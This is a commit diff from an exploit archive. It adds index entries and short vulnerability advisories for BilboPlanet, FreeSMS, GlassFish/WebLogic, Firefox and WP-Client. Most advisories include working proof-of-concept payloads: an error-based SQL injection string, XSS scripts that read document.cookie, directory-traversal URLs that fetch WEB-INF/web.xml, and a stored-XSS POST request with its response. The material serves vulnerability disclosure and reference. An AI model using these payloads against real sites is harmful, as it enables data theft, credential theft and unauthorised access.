DB: 2015-11-25
6 new exploits
This commit is contained in:
Offensive Security
parent
daf16b0803
commit
780a01d850
8 changed files with 129 additions and 6 deletions
|
|
@ -35045,6 +35045,7 @@ id,file,description,date,author,platform,type,port
|
|||
38771,platforms/windows/dos/38771.py,"ShareKM Remote Denial of Service Vulnerability",2013-09-22,"Yuda Prawira",windows,dos,0
|
||||
38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A_ ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0
|
||||
38781,platforms/php/webapps/38781.txt,"AlienVault Open Source SIEM (OSSIM) 3.1 'date_from' Parameter Multiple SQL Injection Vulnerabilities",2013-10-02,"Yu-Chi Ding",php,webapps,0
|
||||
38803,platforms/php/webapps/38803.txt,"WP-Client 3.8.7 - Stored XSS Vulnerability",2015-11-24,"Pier-Luc Maltais",php,webapps,80
|
||||
38782,platforms/php/webapps/38782.php,"WordPress SEO Watcher Plugin 'ofc_upload_image.php' Arbitrary PHP Code Execution Vulnerability",2013-10-03,wantexz,php,webapps,0
|
||||
38775,platforms/linux/local/38775.rb,"Chkrootkit Local Privilege Escalation",2015-11-20,metasploit,linux,local,0
|
||||
38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0
|
||||
|
|
@ -35058,7 +35059,7 @@ id,file,description,date,author,platform,type,port
|
|||
38787,platforms/windows/dos/38787.txt,"Acrobat Reader DC 15.008.20082.15957 - PDF Parsing Memory Corruption Vulnerability",2015-11-23,"Francis Provencher",windows,dos,0
|
||||
38788,platforms/windows/dos/38788.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption Vulnerability",2015-11-23,"Francis Provencher",windows,dos,0
|
||||
38789,platforms/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption Vulnerability 2",2015-11-23,"Francis Provencher",windows,dos,0
|
||||
38790,platforms/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution Exploit",2015-11-23,"Mohammad Reza",php,webapps,80
|
||||
38790,platforms/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution Exploit",2015-11-23,"Mohammad Reza Espargham",php,webapps,80
|
||||
38791,platforms/windows/dos/38791.rb,"Audacious 3.7 - ID3 Local Crash PoC",2015-11-23,"Antonio Z.",windows,dos,0
|
||||
38792,platforms/windows/local/38792.txt,"NVIDIA Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",windows,local,0
|
||||
38793,platforms/windows/dos/38793.txt,"Windows ndis.sys IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0
|
||||
|
|
@ -35066,3 +35067,8 @@ id,file,description,date,author,platform,type,port
|
|||
38795,platforms/windows/dos/38795.txt,"Windows Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
|
||||
38796,platforms/windows/dos/38796.txt,"Windows Kernel Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0
|
||||
38797,platforms/php/remote/38797.rb,"Joomla Content History SQLi Remote Code Execution",2015-11-23,metasploit,php,remote,80
|
||||
38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox Cookie Verification Denial of Service Vulnerability",2013-04-04,anonymous,multiple,dos,0
|
||||
38799,platforms/php/webapps/38799.txt,"BilboPlanet 'auth.php' SQL Injection Vulnerability",2013-10-11,"Omar Kurt",php,webapps,0
|
||||
38800,platforms/php/webapps/38800.txt,"FreeSMS pages/crc_handler.php scheduleid Parameter SQL Injection",2013-09-27,"Sarahma Security",php,webapps,0
|
||||
38801,platforms/php/webapps/38801.txt,"FreeSMS pages/crc_handler.php Multiple Parameter XSS",2013-09-27,"Sarahma Security",php,webapps,0
|
||||
38802,platforms/multiple/remote/38802.txt,"Oracle Glassfish Server 2.1.1/3.0.1 Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access",2013-10-15,"Alex Kouzemtchenko",multiple,remote,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
11
platforms/multiple/dos/38798.txt
Executable file
11
platforms/multiple/dos/38798.txt
Executable file
|
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/62969/info
|
||||
|
||||
Mozilla Firefox is prone to a denial-of-service vulnerability because it fails to verify the user supplied input.
|
||||
|
||||
Successfully exploiting this issue will allow an attacker to inject special characters into the browser's local cookie storage, resulting in the requested website always responding with an error message which is hosted on specific web server software (like lighttpd). This will cause a denial-of-service condition.
|
||||
|
||||
Firefox 19 is vulnerable; other versions may also be affected.
|
||||
|
||||
Note: This issue was previously covered in BID 58857 (Google Chrome and Mozilla Firefox Browser Cookie Verification Security Weakness), but has been moved to its own record for better documentation.
|
||||
|
||||
http://www.example.com/?utm_source=test&utm_medium=test&utm_campaign=te%05st
|
||||
14
platforms/multiple/remote/38802.txt
Executable file
14
platforms/multiple/remote/38802.txt
Executable file
|
|
@ -0,0 +1,14 @@
|
|||
source: http://www.securityfocus.com/bid/63052/info
|
||||
|
||||
Oracle JavaServer Faces is prone to multiple directory-traversal vulnerabilities.
|
||||
|
||||
Exploiting these issues may allow an attacker to obtain sensitive information that could aid in further attacks.
|
||||
|
||||
This vulnerability affects the following products and versions:
|
||||
|
||||
WebLogic Server 10.3.6.0, 12.1.1.0
|
||||
GlassFish Server 2.1.1, 3.0.1, 3.1.2
|
||||
JDeveloper 11.1.2.3.0, 11.1.2.4.0, 12.1.2.0.0
|
||||
|
||||
http://www.example.com/someApp/javax.faces.resource.../WEB-INF/web.xml.jsf
|
||||
http://www.example.com/someApp/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
|
||||
|
|
@ -8,11 +8,7 @@ require 'msf/core'
|
|||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
# EDB note:
|
||||
# This line causes an error when loading
|
||||
# include Msf::Exploit::Remote::HTTP::Wordpress
|
||||
# Replaced with the following:
|
||||
include Msf::HTTP::Wordpress
|
||||
include Msf::Exploit::Remote::HTTP::Wordpress
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
|
|
|
|||
9
platforms/php/webapps/38799.txt
Executable file
9
platforms/php/webapps/38799.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/62989/info
|
||||
|
||||
BilboPlanet is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://example.com/auth.php
|
||||
(POST - user_id)
|
||||
user_id=-1' or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
|
||||
9
platforms/php/webapps/38800.txt
Executable file
9
platforms/php/webapps/38800.txt
Executable file
|
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/63004/info
|
||||
|
||||
FreeSMS is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
Attackers can exploit these issues to execute arbitrary code in the context of the browser, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.
|
||||
|
||||
FreeSMS 2.1.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/freesms/pages/crc_handler.php?method=evaluation&func=getanswers&scheduleid=15{SQL_HERE}
|
||||
12
platforms/php/webapps/38801.txt
Executable file
12
platforms/php/webapps/38801.txt
Executable file
|
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/63004/info
|
||||
|
||||
FreeSMS is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
Attackers can exploit these issues to execute arbitrary code in the context of the browser, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible.
|
||||
|
||||
FreeSMS 2.1.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/freesms/pages/crc_handler.php?method=profile&func=%3Cscript%3Ealert%28123%29%3C/script%3E
|
||||
http://www.example.com/FreeSMS/pages/crc_evaluation.php?crc=diggks5j3mlf6pee6knk34qq60&uid=3&course='"</script><script>alert(document.cookie)</script>
|
||||
http://www.example.com/FreeSMS/pages/crc_login.php?crc=diggks5j3mlf6pee6knk34qq60&uid='"</script><script>alert(document.cookie)</script>
|
||||
http://www.example.com/FreeSMS/pages/crc_handler.php?method=register&func=add -> Username -> '"</script><script>alert(document.cookie)</script>
|
||||
66
platforms/php/webapps/38803.txt
Executable file
66
platforms/php/webapps/38803.txt
Executable file
|
|
@ -0,0 +1,66 @@
|
|||
#####################################################################################
|
||||
|
||||
Application: WP-Client
|
||||
|
||||
Version: 3.8.7
|
||||
|
||||
Author: Pier-Luc Maltais from COSIG
|
||||
|
||||
Twitter: @COSIG_
|
||||
|
||||
#####################################################################################
|
||||
|
||||
1) Introduction
|
||||
2) Report Timeline
|
||||
3) Technical details
|
||||
4) POC
|
||||
|
||||
#####################################################################################
|
||||
|
||||
===============
|
||||
1) Introduction
|
||||
===============
|
||||
One plugin configures multiple areas of your WordPress installation and allows the
|
||||
site Administrator to easily create new Client Areas, Client Management Portals,
|
||||
Client Estimates & Invoices, Client File Upload Areas, or Private Staff Pages on the
|
||||
site by entering just a few data fields. Additionally, clients can upload/download
|
||||
secure files. (https://wp-client.com/)
|
||||
|
||||
|
||||
============================
|
||||
2) Report Timeline
|
||||
============================
|
||||
12/11/2015 - Found the vulnerability
|
||||
12/11/2015 - Ticket opened
|
||||
20/11/2015 - Plugin extension Estimates/Invoices updated (v1.5.2)
|
||||
24/11/2015 - Public disclosure
|
||||
|
||||
|
||||
============================
|
||||
3) Technical details
|
||||
============================
|
||||
WP-Client is vulnerable to a stored XSS attack in the Request Estimate page. The
|
||||
extension affected is Estimates/Invoices v1.5.1.
|
||||
|
||||
|
||||
============================
|
||||
4) POC
|
||||
============================
|
||||
Request :
|
||||
|
||||
POST /portal/request-estimate/ HTTP/1.1
|
||||
[...]
|
||||
wpc_data%5Baction%5D=request&wpc_data%5Btitle%5D=Request+Estimate+from+2015-11-12&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bname%5D=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bdescription%5D=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bquantity%5D=1&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bprice%5D=&wpc_data%5Bwpc_inv_message%5D=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
|
||||
|
||||
Response :
|
||||
|
||||
[...]
|
||||
<div class="wpc_clear"></div>
|
||||
<span>Comments:</span><br>
|
||||
<table id="wpc_inv_table_request_notes" style="width: 100%;">
|
||||
<tr bgcolor="E0E0E0">
|
||||
<td><b>client:</b></td>
|
||||
<td><script>alert(1)</script>
|
||||
[...]
|
||||
|
||||
#####################################################################################
|
||||
Loading…
Add table
Reference in a new issue